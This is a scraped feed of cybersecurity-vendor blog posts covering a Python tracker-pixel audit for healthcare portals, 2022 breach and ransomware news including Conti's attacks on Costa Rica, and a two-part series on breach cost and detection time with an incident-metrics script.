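<script src="/static/app.js"></script>
<script src="https://cdn.portal.example.org/ui.js"></script>
<script src="https://connect.facebook.net/en_US/fbevents.js"></script>
<script>fbq('init', '1234567890'); fbq('track', 'PageView');</script>
<script async src="https://www.googletagmanager.com/gtag/js?id=G-EXAMPLE"></script>
</head><body>
<img src="https://cdn.portal.example.org/logo.png" alt="logo">
<img height="1" width="1" src="https://www.facebook.com/tr?id=1234567890&amp;ev=PageView">
<iframe src="https://maps.example-widgets.net/embed?clinic=12"></iframe>
</body></html>
"""

if __name__ == "__main__":
    results = audit_page(SAMPLE_PORTAL_PAGE, "portal.example.org")
    for finding in results:
        print(finding)
    print("tracker hosts:", tracker_hosts(results))
```

Run this against the rendered HTML of every authenticated page, not just the public home page, since a pixel placed in a shared template fires on appointment and billing screens too. Static parsing misses scripts injected at runtime by a tag manager, so pair it with a browser-side capture of outbound requests before signing off that a portal is clean.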

Additionally, this year 9 of the 10 biggest healthcare breaches (90%) originated with a third-party vendor being compromised.

This continues the trend from 2021, when vendors were responsible for 60% of the 10 largest healthcare breaches. Organizations clearly need to revisit their vendor relationships and contracts to assess what security measures these third parties have in place and how they are protecting themselves from a breach.

Cyber Insurance Rates Reach New Heights

Cyber insurance is one of the fastest-growing insurance markets and is projected to reach $20 billion by 2025.

Premiums are rising dramatically as well, with one report showing a 24.5% increase in Q1 2022 on top of a 74% increase in Q4 2021.

The sharp increase in premiums has many causes, but the most glaring is the rise in ransomware attacks and the claims filed to cover ransom payments, which have driven up insurers' loss ratios.

Cyber insurance underwriters are now more cautious when assessing an applicant's risk and thoroughly review internal security controls and cyber risk procedures.

One positive outcome for the security industry is that insurers now require companies to have either an in-house MDR capability or an outsourced MDR partner defending their networks and devices. Without these measures, insurers are declining to write new policies until those steps are taken.

Google Blocks DDoS Attack in June

On June 1st, a Google Cloud Armor customer endured an HTTPS DDoS attack that peaked at 46 million requests per second (RPS).

This is the largest HTTPS DDoS attack blocked to date, roughly 77% larger than the previous record of 26 million RPS. The attack lasted 69 minutes, and mitigation went according to plan because the customer had already deployed the protective rule that Cloud Armor recommended.

Even though the attack lasted over an hour, the speed at which it ramped up is what stands out. It began at just 10,000 RPS against the victim's load balancer; eight minutes later, when the load jumped to 100,000 RPS, Cloud Armor Adaptive Protection began generating alerts and a suggested rule. Two minutes after that, the attack peaked at 46 million RPS, then slowly tapered off over the next hour.

Google engineers noted that the attackers were not achieving their goal and were spending more to run the attack than they were gaining from it. The malware behind it has not been identified, but there are signs pointing to the Mēris botnet, which was responsible for other near-record DDoS attacks.

Google Becomes a Security Player with Mandiant

Although Google Cloud Platform (GCP) was considered to be one of the big three cloud providers, it was in a distant third place after AWS and Microsoft Azure.

Now with the $5.4 billion acquisition of Mandiant, Google looks to become an even bigger player in the security space. GCP looks to combine its already existing security portfolio with Mandiant’s cyber threat intelligence to give it a new more bolstered position for cloud offerings.

Conti Cybercrime Group

The cybercrime group Conti attacked Costa Rican government agencies, healthcare organizations, and national businesses with ransomware.

On April 15th, the Conti group launched its first attack on Costa Rica. The initial target was the Ministry of Finance, where the group gained access over a VPN connection using credentials stolen by malware installed on a victim machine.

From there, a Conti operator gained access to every host on Costa Rica's interconnected networks, exfiltrated 672 GB of data, and executed ransomware.

The ransom demand was $10 million, accompanied by a threat to attack the rest of Costa Rica's ministries if it wasn't paid.

Costa Rica refused to pay, and Conti followed through on its threat, continuing its attacks on the following agencies:

  • The Administrative Board of the Electrical Service of the Province of Cartago (Jasec)
  • The Ministry of Science, Innovation, Technology and Telecommunications (MICITT)
  • The Ministry of Labor and Social Security (MTSS)
  • The National Meteorological Institute (IMN)
  • Radiográfica Costarricense (Racsa)
  • The Interuniversity Headquarters of Alajuela
  • The Social Development and Family Allowances Fund (FODESAF)
  • Costa Rican Social Security Fund (CCSS)

The attacks led to disruptions costing millions of dollars for Costa Rican businesses, healthcare systems, and government agencies.

On May 8th, the Costa Rican president declared a national emergency, but 11 days later Conti's leadership began to disband: the group's negotiation and news sites went down, and its chatrooms, servers, and proxies began going offline.

By late June the data leak site had been taken down and Conti's operations were declared dead. The group has since rebranded under several different names, but it left its mark, proving that a cyber gang can carry out country-wide extortion.

Other Notable Statistics

  • Ransomware breaches (outside of healthcare) cost businesses an average of $4.62 million. (Varonis)
  • Approximately sixty percent of data breaches are caused by stolen credentials. (Comparitech)
  • On average, a breach goes undetected for 200 days and then takes a further 77 days to contain.
  • Nearly half (43%) of all cyber-attacks are specifically targeted at small businesses. (Dataprot)
  • Mega breaches (involving 50 million to 65 million records) cost an average of $401 million. This figure is significantly higher than previous estimates and highlights just how costly these incidents can be. (Varonis)


]]>
Reducing the Cost of a Data Breach: Part 2 – Mitigating Costs https://www.cybermaxx.com/resources/reducing-the-cost-of-a-data-breach-part-2-mitigating-costs/ Mon, 10 Oct 2022 20:46:52 +0000 https://cybermaxx2021.wpengine.com/?p=5558 In Part 1, some insights were shared into the data breach lifecycle, including the cost savings of reducing the time to detect and contain a cybersecurity incident. In this segment, we’ll take a closer look at some of the key factors that can decrease that time, and therefore reduce exposure and cost. Mitigating Costs While […]

The post Reducing the Cost of a Data Breach: Part 2 – Mitigating Costs appeared first on CyberMaxx.

]]>
In Part 1, some insights were shared into the data breach lifecycle, including the cost savings of reducing the time to detect and contain a cybersecurity incident.

In this segment, we’ll take a closer look at some of the key factors that can decrease that time, and therefore reduce exposure and cost.

Mitigating Costs

While the time it takes to detect, and then contain a breach has a big impact on the overall cost of a breach, IBM Security has identified 28 factors that can influence the cost of a breach.

Many of these factors can shorten the time, and therefore lower the cost of a data breach, while some others may amplify the costs of a breach.

As always, it’s important to know that these costs aren’t additive, and your own experience may vary. We do believe this is a significant sample size that produces consistent average costs*.

Warning: the following paragraphs contain a lot of numbers. I’ve included these not to bore you, but for you to be able to leverage these very real numbers in creating a business case for help in maturing your cybersecurity program.

Numbers Don’t Lie

The report shows that there are several factors that are associated with the biggest impact on reducing the time and cost of a breach: the use of intelligent technology platforms, the use of an incident response (IR) team, and the use of an MDR/XDR solution.

AI Security Platform

The report refers specifically to the use of an AI security platform, and the evaluation of this factor is fairly recent, so I’ll discount it slightly. The benefit of an AI platform is to be able to leverage technology to ‘learn’ and apply that learning without human intervention, leading to automated decisions and actions for remediation.

While there is great promise for this technology, I will submit that having human intelligence built from extensive experience, combined with the automation that technology provides, can produce excellent results that will reduce the time to identify and remediate incidents.

MTTD/MTTC

Regardless, the report finds that organizations with a high level of security automation had an average breach cost 55.3% lower than organizations with little or no automation. Much of this comes down to Mean Time to Detect (MTTD) and Mean Time to Contain (MTTC), which combined dropped from 323 days for organizations with no security automation to 249 days on average for organizations with security automation deployed.

To have an IR plan or not?

A majority of organizations in the study had IR plans and testing of IR plans on a regular basis. Nearly three-quarters of organizations in the study said they had an IR plan. At organizations with an IR plan, a little more than half said they regularly tested the IR plan. Breaches at organizations with IR capabilities saw an average cost of a breach of $3.26 million in 2022, compared to $5.92 million at organizations without IR capabilities. This clearly shows a cost benefit to having and testing an IR plan.

XDR, Please!

XDR technologies in use reduced average breach costs by 9.2%. While that saving may appear modest at first glance, the real impact is in the time organizations save detecting and containing a breach when they use XDR: almost one month. We shared in Part 1 that time is a major factor in determining the impact of a breach. The average time to identify and contain a data breach was 10% lower at organizations with XDR technologies than at those without.

A number of factors also increase the cost of a breach, including security system complexity and a highly remote workforce. For example, a high level of security system complexity was associated with a $2.47 million higher cost of a breach, 58% above the average. Simplicity seems to be better when it comes to security technology.

Remote Work

Remote working has had considerable effects on the cost of a breach when remote work was a factor in causing the breach, such as a remote-working employee having credentials stolen. The study also found that breach costs were highest for organizations with many of their employees working remotely. The difference between the highest and lowest share of employees working remotely was $1.11 million, a difference of 24.4%.

The Skills Gap

As warned, that’s a lot of numbers. The bottom line is that there are a lot of factors that can increase or decrease the effectiveness of a cybersecurity program. In addition to all those factors, there is another pretty big inhibitor: the skills gap.

Many organizations are struggling to fill open positions on their security teams.

In the report, those organizations that said they were sufficiently staffed saw considerable cost savings in terms of data breach costs, compared to those without enough employees to staff their teams. At organizations with a sufficiently staffed security team, the average cost of a data breach was lower than average at $4.01 million. In contrast, the average cost of a data breach was 12.8% higher at organizations with insufficiently staffed security teams.

CyberMaxx can help with all of the above. In fact, we’ve demonstrated this consistently over the past 20 years, with many satisfied customers. We believe that the Mean Time to Detect (MTTD) for a cybersecurity incident should be 15 minutes, not 200 days.

15 minutes…not 200 days!

We’ve consistently beaten that objective, through the combination of experienced, intelligent people, proven processes developed over 20 years, and XDR technology to provide intelligence and automation in support of the people and processes.

We can and want to help!

CyberMaxx can help you develop your incident response strategy and plan, and help you test it to make sure it is effective. CyberMaxx can extend your team to provide 24×7 coverage, or we can be your team.

* The IBM Security Cost of a Data Breach Report 2022 studied 550 organizations of various sizes impacted by data breaches between March 2021 and March 2022 across 17 countries and in 17 different industries


]]>
Reducing the Cost of a Data Breach: Part 1 – Time https://www.cybermaxx.com/resources/reducing-the-cost-of-a-data-breach-part-1-time/ Wed, 05 Oct 2022 20:02:54 +0000 https://cybermaxx2021.wpengine.com/?p=5554 I’m sure all of us (the ‘good guys’, anyway) are working hard to reduce the probability and the cost of cybersecurity breaches. What professionals in the data security industry do is hard, and the ‘bad guys’ seem to be increasingly creative in devising ways to exploit vulnerabilities. It’s what we at CyberMaxx like to call […]

The post Reducing the Cost of a Data Breach: Part 1 – Time appeared first on CyberMaxx.

]]>
I’m sure all of us (the ‘good guys’, anyway) are working hard to reduce the probability and the cost of cybersecurity breaches.

What professionals in the data security industry do is hard, and the ‘bad guys’ seem to be increasingly creative in devising ways to exploit vulnerabilities.

It’s what we at CyberMaxx like to call the digital arms race – bad actors are always trying to find new ways to infiltrate networks and devices with the latest technology and the ‘good guys’ are meeting the challenge to protect organizational assets.

The thing is, we know a lot about how to reduce the cost and the likelihood of a breach, thanks to reports like the IBM Security/Ponemon Institute annual Cost of a Data Breach Report, which has been produced each of the last 17 years.

If you’re out there fighting the good fight every day, there’s a lot of great information contained in these reports. Information that can help make the business case to secure funding and resources to save your organization time, money, and reputation.

This series is intended to highlight several key points and provide real solutions for this very real problem – It is not intended to be a full de-brief of the report, which we encourage you to read in its entirety.

Time

It turns out that the time it takes to detect, and then contain a breach has a big impact on the overall cost of a breach.

The time to identify a breach is the time it takes to detect that an incident has occurred. The time to contain a breach refers to the time it takes to resolve an incident after it’s been detected and to restore service.
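Those two definitions are simple, but teams often report them inconsistently (measuring from the alert rather than the first compromise, or from detection rather than restoration). The script below is an added example, not from the IBM report or from CyberMaxx's tooling, that applies the definitions as stated to a set of incident records: time to identify runs from initial compromise to detection, time to contain from detection to restoration, and the lifecycle is the sum. It reports MTTD, MTTC, and mean lifecycle, flags incidents on the expensive side of the report's 200-day line, and checks each incident against a detection target (15 minutes here, an assumed goal). The incident records are constructed for the example.

```python
"""Time to identify, time to contain and breach lifecycle from incident records (added example)."""
from datetime import datetime, timedelta
from statistics import mean

LIFECYCLE_THRESHOLD = timedelta(days=200)  # the report's cost split
DETECTION_TARGET = timedelta(minutes=15)   # assumed aggressive detection goal

# Constructed sample: (incident id, first compromise, detection, containment/restoration).
INCIDENTS = [
    ("INC-1", "2022-01-03T08:00", "2022-07-29T10:30", "2022-10-07T17:00"),  # long-lived intrusion
    ("INC-2", "2022-03-15T12:00", "2022-03-15T12:12", "2022-03-16T09:00"),  # caught in 12 minutes
    ("INC-3", "2022-05-01T00:00", "2022-05-30T00:00", "2022-06-10T00:00"),  # found after a month
]


def incident_metrics(record):
    """Per-incident durations; rejects records whose timestamps are out of order."""
    incident_id, compromised, detected, contained = record
    c, d, r = (datetime.fromisoformat(ts) for ts in (compromised, detected, contained))
    if not (c <= d <= r):
        raise ValueError(f"{incident_id}: expected compromise <= detection <= containment")
    return {
        "id": incident_id,
        "time_to_identify": d - c,   # compromise -> detection
        "time_to_contain": r - d,    # detection -> restoration
        "lifecycle": r - c,          # the report's "breach lifecycle"
    }


def _days(delta: timedelta) -> float:
    return delta.total_seconds() / 86400


def summarize(records, threshold=LIFECYCLE_THRESHOLD):
    """MTTD, MTTC and mean lifecycle in days, plus incidents over the threshold."""
    metrics = [incident_metrics(rec) for rec in records]
    return {
        "mttd_days": mean(_days(m["time_to_identify"]) for m in metrics),
        "mttc_days": mean(_days(m["time_to_contain"]) for m in metrics),
        "mean_lifecycle_days": mean(_days(m["lifecycle"]) for m in metrics),
        "over_threshold": [m["id"] for m in metrics if m["lifecycle"] > threshold],
    }


def detection_target_misses(records, target=DETECTION_TARGET):
    """Incidents whose time to identify exceeded the detection target."""
    return [m["id"] for m in map(incident_metrics, records) if m["time_to_identify"] > target]


if __name__ == "__main__":
    print(summarize(INCIDENTS))
    print("missed detection target:", detection_target_misses(INCIDENTS))
```

The validation step matters more than it looks: a record whose detection timestamp predates the compromise usually means the compromise date was never established, and averaging such records quietly understates MTTD. The single long-lived intrusion in the sample dominates the means, which is the same effect that keeps industry-wide MTTD above 200 days.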

To show where improvements can be made, let’s take a look at data showing the time to detect and contain over the past few years. In the chart below (Figure 8 from the report), we see that over the past seven years not much has changed significantly. The shocking number that pops out is that in 2022 it still took over 200 days on average* to identify that a breach occurred.

[Chart: Reducing the Cost of a Data Breach: Part 1 (Figure 8 from the IBM report, average time to identify and contain a data breach, by year)]

That’s more than six months just to detect the breach.

And another two months after detection to contain the incident.

Just imagine if better safeguards were in place in order to cut down on the amount of time a breach incident was active, or even better yet, prevent the breach from happening in the first place.

The Impact of Time on the Cost of a Breach

According to the report, a data breach lifecycle (the total time from breach to detection to containment) of less than 200 days was associated with an average cost of $3.74 million in 2022, $1.12 million less than for a lifecycle of more than 200 days ($4.86 million). Shortening the lifecycle to under 200 days is therefore fairly significant: a 26.5% difference in the cost of a breach, by the report's calculation.

Apparently, Time is Money

At CyberMaxx, we believe that a data breach lifecycle of 200 days, while less expensive than a data breach lifecycle of more than 200 days, is still much too long (Remember, we’re still talking about half of a year just to detect).

While the referenced report does not calculate the savings of reducing the lifecycle by another 25, 50, 75, or even 90%, we believe early detection and response is one of the keys to a successful cybersecurity program.

CyberMaxx has extremely aggressive goals for detection and response, which we consistently exceed.

How? With a proven combination of people, process, and technology.

We’ll take a closer look at some of the key factors related to reducing the time to detect and respond, and therefore the cost mitigation of a breach, in Part 2.

* The IBM Security Cost of a Data Breach Report 2022 studied 550 organizations of various sizes impacted by data breaches between March 2021 and March 2022 across 17 countries and in 17 different industries


]]>